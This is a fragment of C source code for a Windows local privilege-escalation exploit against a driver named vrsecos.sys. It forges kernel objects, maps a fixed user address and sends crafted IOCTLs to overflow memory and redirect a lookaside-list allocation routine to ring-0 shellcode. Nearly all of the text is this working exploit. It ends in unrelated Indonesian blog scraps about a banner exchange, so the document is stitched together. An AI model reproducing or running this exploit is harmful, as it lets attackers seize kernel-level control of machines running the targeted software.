HANDLE hthread = OpenThread(THREAD_ALL_ACCESS , FALSE , GetCurrentThreadId());
PSYSTEM_HANDLE_INFORMATION phi = (PSYSTEM_HANDLE_INFORMATION)GetInfoTable(SystemHandleInformation);
PSYSTEM_MODULE_INFORMATION pmi = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);
//get base address of vrsecos.sys
PVOID vrsecosbase = 0 ;
ULONG i ;
for (i = 0 ; i < pmi->Count ; i ++)
{
if (stricmp((PCHAR)(pmi->Module[i].ImageName + strlen(pmi->Module[i].ImageName ) - strlen("vrsecos.sys")) ,
"vrsecos.sys") == 0 )
{
vrsecosbase = pmi->Module[i].Base;
break ;
}
}
if (vrsecosbase == 0 )
{
printf("cannot find vrsecos....\n");
//return 0 ;
}
if (!InbvInit(pmi->Module[0].Base , strrchr(pmi->Module[0].ImageName , '\\')+1))
{
printf("cannot init inbv system\n");
return 0 ;
}
//get thread object
PVOID MyThreadOBJ = NULL ;
for (i = 0 ; i < phi->NumberOfHandles ; i ++)
{
if (phi->Information[i].HandleValue == (USHORT)hthread &&
phi->Information[i].UniqueProcessId == (USHORT)GetCurrentProcessId())
{
MyThreadOBJ = phi->Information[i].Object;
break ;
}
}
if (MyThreadOBJ == NULL)
{
printf("cannot find my thread object\n");
return 0 ;
}
//for KeWaitForSignleObject
//KeWaitForSignleObject will check SignalState
pmutant->Header.SignalState = 0x30303030;
pmutant->MutantListEntry.Flink = (PLIST_ENTRY)((ULONG)vrsecosbase + 0x2db0 );
pmutant->MutantListEntry.Blink = (PLIST_ENTRY)((ULONG)vrsecosbase + 0x2db0) ;
//for KeReleaseMutex , Mutant 's owner thread must be our thread when KeReleaseMutex
pmutant->OwnerThread = MyThreadOBJ;
//for IOCTL CODE 0x83072014
//spec NPAGED_LOOKASIDE_LIST List
//
// user address space
PVOID pAlloc = VirtualAlloc((PVOID)0x0A0A0A0A , 0x1000 , MEM_RESERVE|MEM_COMMIT , PAGE_READWRITE);
if (pAlloc == NULL)
{
printf("cannot allocate spec addr %u\n! ", GetLastError());
return 0 ;
}
*(DWORD*)0x0a0a0101 = 0 ;
// vrsecos+2d68 < vrsecos+2d64
// and vrsecos+2d68 < 0
*(DWORD*)((ULONG)pdata + 0x81c +200) = 0xc1c1c1c1 ;
*(DWORD*)((ULONG)pdata + 0x820 + 200) = 0xc0c0c0c0 ;
//fill NPAGED_LOOKASIDE_LIST
*(DWORD*)((ULONG)pdata + 0xdd8 + 200) = 0x0a0a0101;
*(DWORD*)((ULONG)pdata + 0xddc +200 ) = 0x01010101 ;
//fill NPAGE_LOOKASIDE_LIST->AllocateRoutine
//is our R0 Shell Code !!!
*(DWORD*)((ULONG)pdata + 0xdd8 + 0x28 +200 ) = (DWORD)InbvShellCode;
ULONG btr ;
ULONG temp;
//memory overflow!!
if (!DeviceIoControl(hDev , 0x8307202c , pdata , 0x1000 , NULL , 0 , &btr , NULL ))
{
printf("dev ctl 1 failed %u\n", GetLastError());
return 0 ;
}
PVOID pdata2 = malloc(0x6d4);
*(DWORD*)pdata2 = 1;
*(ULONG*)((ULONG)pdata2 + 8 ) = 0 ;
strcpy((PCHAR)((ULONG)pdata2 + 264) , "exploit you !");
strcpy((PCHAR)((ULONG)pdata2 + 464) , "exploit you !!");
//first time , NPAGED_LOOKASIDE_LIST got ZERO !!
if (!DeviceIoControl(hDev , 0x83072014 , pdata2 , 1748 , &temp , 4 , &btr , 0 ))
{
printf("dev ctrl 2 failed %u\n", GetLastError());
return 0 ;
}
//second time , go NPAGED_LOOKASIDE_LIST->AllocateRoutine!!
if (!DeviceIoControl(hDev , 0x83072014 , pdata2 , 1748 , &temp , 4 , &btr , 0 ))
{
printf("dev ctrl 2 failed %u\n", GetLastError());
return 0 ;
}
return 0 ;
}
# oz return
oz3
xp remo club
Banner Exchange
Untuk Anda yang mau tukar Link silahkan copas script ini,,saya akan memasang banner anda di blog ini
Harga Blog Liyan oz
